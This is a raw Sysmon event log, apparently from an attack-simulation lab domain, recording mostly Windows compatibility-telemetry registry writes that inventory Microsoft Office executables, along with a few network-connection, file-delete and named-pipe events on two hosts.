13241300x800000000000000077502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pj11icon.exe|3eb73d0357cb7ab9\LinkDate03/04/2021 07:50:55 13241300x800000000000000077501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pj11icon.exe|3eb73d0357cb7ab9\Publishermicrosoft corporation 13241300x800000000000000077500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pj11icon.exe|3eb73d0357cb7ab9\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\pj11icon.exe 13241300x800000000000000077499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\perfboost.exe|27e8fad257309e8d\BinProductVersion16.0.13127.21348 13241300x800000000000000077498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\perfboost.exe|27e8fad257309e8d\LinkDate03/06/2021 23:33:59 13241300x800000000000000077497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\perfboost.exe|27e8fad257309e8d\Publishermicrosoft corporation 13241300x800000000000000077496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\perfboost.exe|27e8fad257309e8d\LowerCaseLongPathc:\program files\microsoft office\root\office16\perfboost.exe 13241300x800000000000000077495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pdfreflow.exe|8db2822531d6bf4e\BinProductVersion16.0.13127.21348 13241300x800000000000000077494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pdfreflow.exe|8db2822531d6bf4e\LinkDate03/06/2021 23:36:54 13241300x800000000000000077493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pdfreflow.exe|8db2822531d6bf4e\Publishermicrosoft corporation 13241300x800000000000000077492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\pdfreflow.exe|8db2822531d6bf4e\LowerCaseLongPathc:\program files\microsoft office\root\office16\pdfreflow.exe 13241300x800000000000000077491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\outlook.exe|bf505a2e251894e\BinProductVersion16.0.13127.21348 13241300x800000000000000077490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\outlook.exe|bf505a2e251894e\LinkDate03/06/2021 23:52:21 13241300x800000000000000077489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\outlook.exe|bf505a2e251894e\Publishermicrosoft corporation 13241300x800000000000000077488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\outlook.exe|bf505a2e251894e\LowerCaseLongPathc:\program files\microsoft office\root\office16\outlook.exe 13241300x800000000000000077487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\outicon.exe|5d91efc2ef9fbaa3\BinProductVersion16.0.13127.21336 13241300x800000000000000077486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\outicon.exe|5d91efc2ef9fbaa3\LinkDate03/04/2021 07:50:51 13241300x800000000000000077485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\outicon.exe|5d91efc2ef9fbaa3\Publishermicrosoft corporation 13241300x800000000000000077484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\outicon.exe|5d91efc2ef9fbaa3\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\outicon.exe 13241300x800000000000000077483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ospprearm.exe|a1d69ba702646028\BinProductVersion(Empty) 13241300x800000000000000077482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ospprearm.exe|a1d69ba702646028\LinkDate02/05/2021 12:30:19 13241300x800000000000000077481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ospprearm.exe|a1d69ba702646028\Publisher(Empty) 13241300x800000000000000077480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ospprearm.exe|a1d69ba702646028\LowerCaseLongPathc:\program files\microsoft office\office16\ospprearm.exe 13241300x800000000000000077479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\osmclienticon.ex|bc2995a7d78281bf\BinProductVersion16.0.13127.21336 13241300x800000000000000077478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\osmclienticon.ex|bc2995a7d78281bf\LinkDate03/04/2021 07:50:17 13241300x800000000000000077477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\osmclienticon.ex|bc2995a7d78281bf\Publishermicrosoft corporation 13241300x800000000000000077476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\osmclienticon.ex|bc2995a7d78281bf\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\osmclienticon.exe 13241300x800000000000000077475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\osmadminicon.exe|1023b0e7e6d67170\BinProductVersion16.0.13127.21336 13241300x800000000000000077474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\osmadminicon.exe|1023b0e7e6d67170\LinkDate03/04/2021 07:50:17 13241300x800000000000000077473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\osmadminicon.exe|1023b0e7e6d67170\Publishermicrosoft corporation 13241300x800000000000000077472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\osmadminicon.exe|1023b0e7e6d67170\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\osmadminicon.exe 13241300x800000000000000077471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ose.exe|4d61fdf0b4f5491a\BinProductVersion16.0.13127.20164 13241300x800000000000000077470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ose.exe|4d61fdf0b4f5491a\LinkDate08/10/2020 01:30:07 13241300x800000000000000077469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ose.exe|4d61fdf0b4f5491a\Publishermicrosoft corporation 13241300x800000000000000077468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\ose.exe|4d61fdf0b4f5491a\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\source engine\ose.exe 13241300x800000000000000077467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\orgchart.exe|f3872224b48ee8a5\BinProductVersion16.0.13127.21348 13241300x800000000000000077466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\orgchart.exe|f3872224b48ee8a5\LinkDate03/06/2021 23:32:37 13241300x800000000000000077465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\orgchart.exe|f3872224b48ee8a5\Publishermicrosoft corporation 13241300x800000000000000077464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\orgchart.exe|f3872224b48ee8a5\LowerCaseLongPathc:\program files\microsoft office\root\office16\orgchart.exe 13241300x800000000000000077463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\onenotem.exe|ee4342edaa4ce03e\BinProductVersion16.0.13127.21348 13241300x800000000000000077462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\onenotem.exe|ee4342edaa4ce03e\LinkDate03/06/2021 23:33:54 13241300x800000000000000077461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\onenotem.exe|ee4342edaa4ce03e\Publishermicrosoft corporation 13241300x800000000000000077460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\onenotem.exe|ee4342edaa4ce03e\LowerCaseLongPathc:\program files\microsoft office\root\office16\onenotem.exe 13241300x800000000000000077459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\onenote.exe|1340679fc786a65d\BinProductVersion16.0.13127.21348 13241300x800000000000000077458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\onenote.exe|1340679fc786a65d\LinkDate03/06/2021 23:34:13 13241300x800000000000000077457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\onenote.exe|1340679fc786a65d\Publishermicrosoft corporation 13241300x800000000000000077456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\onenote.exe|1340679fc786a65d\LowerCaseLongPathc:\program files\microsoft office\root\office16\onenote.exe 13241300x800000000000000077455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\onedrivesetup.ex|13fa51f7fa101eb7\BinProductVersion18.151.729.13 13241300x800000000000000077454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\onedrivesetup.ex|13fa51f7fa101eb7\LinkDate09/17/2018 17:44:14 13241300x800000000000000077453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\onedrivesetup.ex|13fa51f7fa101eb7\Publishermicrosoft corporation 13241300x800000000000000077452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\onedrivesetup.ex|13fa51f7fa101eb7\LowerCaseLongPathc:\program files\microsoft office\root\integration\addons\onedrivesetup.exe 13241300x800000000000000077451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\olicenseheartbea|685556b86b591b30\BinProductVersion16.0.13127.21348 13241300x800000000000000077450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\olicenseheartbea|685556b86b591b30\LinkDate03/06/2021 23:35:14 13241300x800000000000000077449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\olicenseheartbea|685556b86b591b30\Publishermicrosoft corporation 13241300x800000000000000077448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\olicenseheartbea|685556b86b591b30\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\olicenseheartbeat.exe 13241300x800000000000000077447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\olcfg.exe|a02976be835ef87a\BinProductVersion16.0.13127.20164 13241300x800000000000000077446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\olcfg.exe|a02976be835ef87a\LinkDate08/10/2020 01:17:52 354300x800000000000000050466Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:01.804{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52531-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050465Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.889{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59078-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050464Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:03.228{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E34D24271035E8084714A16BD43B3F1,SHA256=4C7255786CEC1EDA9F21917C4FDA2892D2991416C720BABA1B0C04E9DA4C84B7,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000077918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000077915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.982{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFAAD53C71C7C72A69.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000077914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.982{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF574491223A3DE317.TMPMD5=500E5B37C9A83F4489F7E6CC87BDC102,SHA256=45CD5872F72FA0CD5A5CD3A686A19611A4BA9645B91171F026EF98F245C59A7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000077913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.982{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF414DEE35AC428998.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000077912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.982{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF71407C7C59FA7B93.TMPMD5=500E5B37C9A83F4489F7E6CC87BDC102,SHA256=45CD5872F72FA0CD5A5CD3A686A19611A4BA9645B91171F026EF98F245C59A7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000077911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.982{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI6AFE.tmpMD5=575228FCEBCC1B36A13BE5D09C444F46,SHA256=E97AC3DFA2538ACD00F3C6A499267EBDDE496914F567089241C7E78AF3A532FC,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000077910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 